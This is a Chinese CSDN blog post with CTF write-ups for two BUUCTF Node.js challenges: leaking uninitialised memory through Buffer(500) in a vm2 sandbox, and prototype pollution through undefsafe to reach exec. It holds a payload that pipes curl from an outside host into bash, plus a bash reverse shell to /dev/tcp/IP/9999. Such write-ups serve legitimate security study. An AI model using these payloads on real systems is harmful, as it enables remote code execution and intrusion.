Buu平台---Nodejs两个题解

最新推荐文章于 2024-10-04 17:17:09 发布
最新推荐文章于 2024-10-04 17:17:09 发布
阅读量353 收藏 5
点赞数 5
分类专栏: CTF-Web 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/142488565
版权

[HITCON 2016]Leaking

知识点
  • node.js中的VM2沙箱逃逸
  • JS通过Buffer类处理二进制数据的缓冲区
题解
"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

看到了引入了vm2模块

在较早一点的node.js版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

注:关于 Buffer
JavaScript 语言自身只有字符串数据类型,没有二进制数据类型。
但在处理像TCP流文件流时,必须使用到二进制数据。因此在 Node.js中,定义了一个 Buffer 类,该类用来创建一个专门存放二进制数据的缓存区。

# [HITCON 2016]Leaking --- Exp
# encoding=utf-8

import requests
import time
url = 'http://7d85438f-71af-4300-8736-eea86835a461.node5.buuoj.cn:81/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

[网鼎杯 2020 青龙组]notes

知识点
  • 原型链污染
  • undefsafe包 - 版本小于2.0.3有漏洞
#截取部分代码
class Notes {
    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }
}

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

可以看到在/status路由下存在exec执行函数,又可以看到存在undefsafe包

->通过undefsafe污染commands属性

->进而执行exec函数

Payload

id=__proto__&author=curl%20http://IP/shell.txt|bash&raw=a

IP指的是公网ip

shell.txt:
bash -i >& /dev/tcp/IP/9999 0>&1
参考

wp

Liqd
关注
专栏目录
buu题解-crackMe
m0_73393932的博客
03-21 484
逆向
Buu-Web两个题解
2302_79839194的博客
09-15 399
一旦这个结果为NULL, 那么下一次的hash加密的 秘钥为空,我们也就可以得到了最终的密文。的作用:这里是exec(), 用;分割前面的nc, 后面加上自己想执行的命令。这里我用ls命令没有看到flag,用dir命令就可以看到,不知道为什么。一个文件上传(检测ip为127.0.0.1):由于这个检测的方式是。服务端会对url进行访问 -> SSRF -> 由服务端进行的请求。很明确,秘钥未知,如何知道通过sha256加密之后的值?如果传入数组, 加密的结果为NULL。无法通过HTTP头伪造。
BUU UPLOAD-LABS LINUX 1
m0_67219349的博客
10-22 86
文件上传
Buu-Web两个记录
2302_79839194的博客
09-17 679
尝试抓包,发现有Session数据,尝试对Session进行解密,我不知道为什么jwt.io网站解密不出来,用脚本解密。打开题目环境,给出计算式子,返回计算结果,发现只能输入运算符和数字,输入字母就会报错,随便尝试的时候,输入。那么思路就来了 -> 我们直接输入字母会遭检测 -> 通过直接伪造Session来输入。通过脚本,依据秘钥,编写执行语句(注意格式)-> 这里的双引号转义的原因我也不知道。路由抓包,修改Session,提前监听端口,发包,成功反弹shell。看了wp说,通过这个报错来获取信息。
buu--来首歌吧!
qq_51802152的博客
11-14 114
buu---来首歌吧~
buu Quoted-printable
ao52426055的博客
11-24 429
查看题目 首先这个题目就是试一加密编程 试一我们直接用Quoted-printable解密即可 把得到的 那你也很棒哦 用flag包裹即可
buu old-fashion
ao52426055的博客
11-26 338
查看题目 跟上一道题一样直接强行爆破
buu-Upload-Labs通关
qq_61774705的博客
07-07 1399
源码如下: 写好php代码: 我们把写有这个代码的php文件传上去并成功执行就算成功。 白名单加只提取最后一个文件后缀名,不能直接上传php文件,先上传一个图片文件,在通过抓包直接改后缀名为php。 上传成功并成功执行: 源码如下: 只是查看文件类型是不是'image/jpeg'、'image/png'、 'image/gif'。这里可以直接上传一个php文件,然后把Conent-Type 改为上面3个其中一个就可以,也可以和第一关一样。源码如下: ...............
BUU-Crypto-RSA3
七堇年的博客
01-04 301
BUU-Crypto-RSA3
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 504
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
端口隔离配置的实验
zhgjx_ywz的博客
09-28 789
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 242
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1188
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1024
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 420
Windows注册表
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值